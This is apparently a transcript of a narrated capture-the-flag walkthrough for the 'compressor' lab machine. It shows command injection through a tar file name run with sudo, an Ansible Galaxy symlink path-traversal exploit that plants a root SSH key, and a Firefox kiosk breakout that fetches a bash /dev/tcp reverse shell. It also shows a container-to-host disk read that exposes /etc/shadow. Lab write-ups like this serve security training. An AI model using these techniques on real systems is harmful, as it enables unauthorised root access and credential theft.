authentication. Authentication is missing. So let's go back to that strings, and we will grep for auth. grep-i. Oh, we're on EB. There we go. It probably wants auth_code is going to be my guess. So let's go and add auth code. Auth code. And then that is down here. So let's grab this. Paste that. Num value invalid for run. So this probably wants like what playbook number to run. So we can say num 1. And it may be an integer. I'm not sure. So let's not put quotes around it. And that looks promising. It's at least hanging. So it looks like it's working, right? The authentication of the host, it SSH some, oh, it SSH to local host. That's what it just did there. But there it's updating the app cache. So we have successfully figured that piece out. Now we looked at it in runner.c and we didn't see anything really dangerous with this, right? We could just run the playbook. We could now try, instead of action run, we can do install. And we'll see what error message this gives. Role file missing or invalid for install action. Let's go back to the strings. Less install. So role_file is probably going to be the argument, just based upon the position. So we say role_file, and then we can say ipsec.tar, and we want to run a command. So I'll do id. We run this, and it says invalid tar archive. So if I just create ipsec.tar, is it still going to say that? It is. So let's remove that. Let's do tar cf ipsec.tar, and then we'll archive passwd. So now we have a valid tar archive. And when we run this, let's go back to that sudo. It still says invalid tar archive. Let's see. Let's move ipsec.tar to dev shm, and then test.json. We can say dev shm ipsec.tar, sudo, still invalid. I wonder if it wants it to be like a gzip. Invalid tar archive. I was seeing if it gave any indication. Doesn't. And my other thought is we should move that test.json here real quick. It's trying to do a file open ipsec.tar and then semicolon ID, and that's where it's failing. So let's move this to ipsec.tar. We can put this in single quotes, so we can make that a file name, because file names can have that single quote character. So now let's run this sudo again. And it looks like it's taking longer, which is a good sign. So that was the issue. The file open command, it needed to be a file, right? We just said open ipsec.tar and then semicolon ID. It tried to open the file and it didn't exist. When we made that file exist, it did. And now hopefully it's passing this straight to system, and it looks like it is. We have the ID command there. So let's move ipsec.tar ID to be ipsec.tar bash, and we can editor test.json to reflect that. So we can do bash there and execute. So this is going to take 10-15 seconds for it to process that tar archive. I think it's loading like Ansible Galaxy right now in the process, and that's why it takes a little bit. But hopefully, once it does this, it'll just drop us magically into a shell. So any moment now. There we go. We have an error out, but we can see it executed bash, and we are now root. So we can get root.txt that way. Now, that's actually unintended. You're supposed to exploit a CVE in Ansible Galaxy. So let's go ahead and do that before we do the real unintended in this box that doesn't even touch any of the runner binaries at all. So let's go over to Firefox, and we're going to search for CVEs within Ansible, because if we can find a CVE related to like installing a role, there's a high chance that we can exploit that, right? So looking for recent CVEs, one does stick out. We have this: an absolute path traversal vulnerability exists in Ansible automation to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite the file outside of the execution path. So this seems like a typical like zip attack or unarchiving attack, where you give them an archive, the archive has a symlink, and when it extracts that archive, it obeys the symlink and puts the file in a place that it wasn't expecting. So if we look at the CVE, if we went here, there's not much like information on it, but we could go to GitHub Ansible and then search all the issues for this CVE number and see if they were chatting about it on the GitHub page at all. So go over to issues on Ansible, just search for the CVE, and we have one right here: prevent roles from using symlinks. This sounds like exactly what we want. So let's go over to the commits, or actually files changed for this PR, and we can see everything that's changed. The really cool thing about this is the Ansible team actually built a unit test to exploit this vulnerability whenever they run unit tests to make sure it does not come back again. So this is a playbook that is executing this vulnerability. And it does it by running this script to create the malicious archive. So what we're going to do is just copy this, and we're going to run it on our local box. So let's just call it create.py. That's the title of it. Let's see. View file. Then do I just go / we can click on raw. Copy. And then paste. Okay. And let's see. Actually, I'm going to make a directory called Ansible to put this in. Okay. And let's look at exactly what this does. So we give it 3 arguments. We give it the archive, then the file we want to write, and then the path we want to write at. So I'm going to say I'll call it ipsec, and I'm going to say please subscribe. And we can say Python 3 create ipsec. We'll create this as ipsec.tar, then ipsec. And we want to write this to, I'm going to write dev shm pwned. And I'm writing here first just because I can see this directory. If we went straight to like trying to write a root SSH key, we can't see if it like worked or not, so we can't really do any debugging. So I always like just writing to a place where we control first. So let's create a web server here. Okay. Then we can go over here, curl 10.10.14.8, 8000 ipsec.tar, and we can write ipsec.tar. And we want to edit the JSON because now we're going to remove the semicolon. And we can do the sudo to run this. Lopez's password. Oh, man. What was Lopez's password? We got that from the Laravel thing. Or not Laravel, Suricata. Do we have it in creds? We don't. Varlog. Let's see. Where is this? Varlog Suricata. And grep Lopez. We'll do -I. I was on Eve JSON 8GZ. And let's see, his password is going to be command pass. This one. Okay. So sudo paste. And this is going to take a little bit to run. Dev-shm ipsec.tar was not installed successfully. Okay, that's weird. I'm going to not specify the full path here. Does that fix it? Okay, that did it. If I do lsla, we can see pwned, and the UID is 1000. And the group ID is Lopez, which is a bit odd. Group, let's cat etsy group. Grep Lopez 1003. I'm going to guess my user on my box is 1003, like ipsec. Let's see. Group. Yep. So it's taking the permission bits from my box and applying them to that archive. So when we run this, we want to make sure we run it as root. So let's just do a sudo su. And then we can go back into, oh, we're already there. Sweet. So I'm going to do sh keygen -t ed 25519. I want to say, I'm going to call it key. And all that is a shorter pub key format. So if I cat my private key or pub key, it's much shorter than RSA. A bit nice, I guess, in that sense. So let's see. What we want to do is make sure this is set to read only by root. So let's do chmod 600 key.pub. Okay. And we're going to call python3 create. The tar archive has to be unique because we already installed the ipsec role. So I'm going to call this the pwned role. So pwn.tar. And then what we want to give it is key.pub. And that's going to be root SSH authorized keys. Okay. So let's start up a web server. We can curl it now. So curl 10.10.14.8 pwn.tar pwn.tar. We have it. So we do test.json. Let's create this role. Sudo again. And it says pwned was installed successfully. So now let's go over to our key. So dev shm. Where do we install this? Uh-oh. Oh, and Ansible. Okay. Let's see. Root owns it, so I have to do sudo su again. So we can do sh-i key root at compressor.htb. Accept the key. And we get logged in. So that is doing it the intended way through exploiting the Ansible CVE. Now, I did say there is a way to do it from dev account before we even enumerate Suricata, the FTP, all that stuff. It does not even matter. So let's just go straight from the beginning. We're only dev account right here. And we're going to run the psef-forest --S. And we're going to scroll down to where we see all that Docker stuff, right? And this is where we saw VNC earlier. We kind of skipped over it because it's part of the unintended route. Selenium is running in some weird container that is automating the cross-site scripting thing, right? So if we look at this, we see the VNC server is listening on port 5900. And this container right here, the 4444, is the Selenium browser, right? So let's make a port forward to 172.21.04. I'm going to forward port 4444 and 5900. So let's do that real quick. The very first thing on the line I'm going to type is that squiggly C. If it's the first thing, it drops in this command prompt. I'm going to do a -L 4444. I guess I don't want to copy and paste. Oh man, that sucks. 172.21.04, like that. And we have forwarded that port. So if I go to localhost on this, we have Selenium Grid, right? We can go to sessions. We click here. Maybe we can view a screenshot, and maybe it's going to fail because we can't talk to something. Oh, we can. The default password for this is secret. So we can connect. Oh, we don't even have to use a VNC browser. So we can do this all from Selenium Grid. The other thing you could do is if we do -L 5900, then 172.21.04, 5900. Then we can run VNC viewer, type localhost, and then it's going to prompt for the password and then that secret. And you can open up in VNC here. So you can either use no VNC in the grid on port quad 4s, or you can use a VNC viewer. It really doesn't matter from this. And you can watch the script do the cross-site scripting thing. But here we have to go through a hotel breakout or a kiosk breakout. So we're going to go into Firefox. We're going to open up settings. And we're going to change its handler on how it handles PDF files. So we're going to search for PDF. And we're going to change this to, instead of open in Firefox, to go run bin bash. If this is not here, let's see. How do I do this? Click here, use other, So then it pops up this whole dialog box. You can select bash here. And now it's going to open up PDFs with bash. And why this is good is because we can do a web server. So let's do vt.sh. I'm going to say bin bash, bash-i, dev tcp 10.10.14.8, 9001, 0, and 1 like that. And then nclvmp 9001. So on this, when I now browse to HTTP 10.10.14.8 port 8000, we called it, I think, t.pdf. t.sh. Let's rename t.sh to t.pdf because the browser is only going to open as a PDF if it has that extension, right? So we did that. Python 3, HTTP server. Okay. Enter. And now we get a shell on the Selenium container. So let's do a Python 3-c import pty spawn bin bash stty raw minus echo foreground. So we can export term is equal to xterm so we can clear the screen. So if we do sudo-l, we can see on this container, we can escalate to root. And since we are root on the container and we have a low privilege account on the host, we can do some shenanigans in order to share the disk from the host to the container, manipulate the permissions, and access them back on the host. It's a little bit odd, but let's just walk through all the steps. The first thing we want to do is list the block devices. So we'll do lsblk, and we want to share SDA3, particularly LVM. So that's going to be 252.0. So let's go over to the container, and I'm going to use make nod to make a special device. We can call it dev, the root LVM, I guess we can call it. And then we want to specify block device 252.0. And then we go to dev, lsla root LVM. We have that special device there. If we try to access it, I don't think we can read files from it. Operation not permitted because we're in a container. What we want to do is we're going to give this chmod 777 permissions. And now we also want to access this directory from this account. And the whole overlay FS, we don't have permission to go through and access the directory from the file system, but we can access it through the proc file system, right? I want to say it's in var somewhere, that's where the overlay FS for this Docker is. That's not how we're going to access it. We're going to get the UID for a user. So we're UID 1001. So I'm going to do a user add, specify UID 1001, IPsec. And now we can SU over to IPsec. And then if I just echo the PID 54164, if I go to proc 54164, that's not this directory. Let's see, ps-ef grep on SU. Let's see. So SU IPsec, let's now ps-ef grep on that. So shell. Okay, this is the PID. I'm not sure. ps-ef grep, do we see that here? No, we don't. Okay, so this is the better way, I guess, to get the PID. Grab the SU command from your container and then look at the process that has a parent PID of that. So we want this. So if I go proc this, now we're in the directory. If I do lscwd, we can see where, I don't think that's where I thought it would be. Let's go to root. And now we're in the root of the Docker, I believe. ls/, we can see external jars. So that's where we are. Let's go to dev. And if we look at dev, oh, CWD was exactly where I wanted it. Root LVM, I just couldn't read it because the font sucks here. But you can do CWD because that's going to go in the current working directory of where this shell is, right? For some reason, I thought I was in this directory. So that's what I was expecting to see. But we're in dev. And we have that, what was it? We called it the root LVM. If I do a strings against it, we can now read it. And this is essentially dev SDA. So we can use debug fs in order to access this. So debug fs, is there like a read-only flag? Let's see, block, super. Just be warned, whenever you use debug fs, there's a high chance the file system panics and goes into a read-only state. This isn't something I'd be doing on a production server. Grepping the thing is a bit safer. You could like grep for the shadow file, like lines in shadow, and get it. I bet if we grepped like, let's see, root on root fs. What would we call it? Root LVM. -a. We'd probably find it eventually. We may have to add like a semicolon. That's passwd right there probably, but let's just do debug fs because it's easier. So debug fs, and we'll give it root LVM, and we can cat root.text, and we get it. We could also cat etc shadow and get it as well. Exit. I did Control D, but the file system is probably going to go and read only in like 15, 20 minutes whenever something happens and it panics. Or maybe it won't because we didn't write a file. I just know debug fs, it's very, very unstable. But that is the unintended way to do the box. You can do this normally whenever you get a root container in Docker and you have a low privilege account on the host. This trick works on a lot of things. So hope you guys enjoyed that. Take care, and I will see you all next time.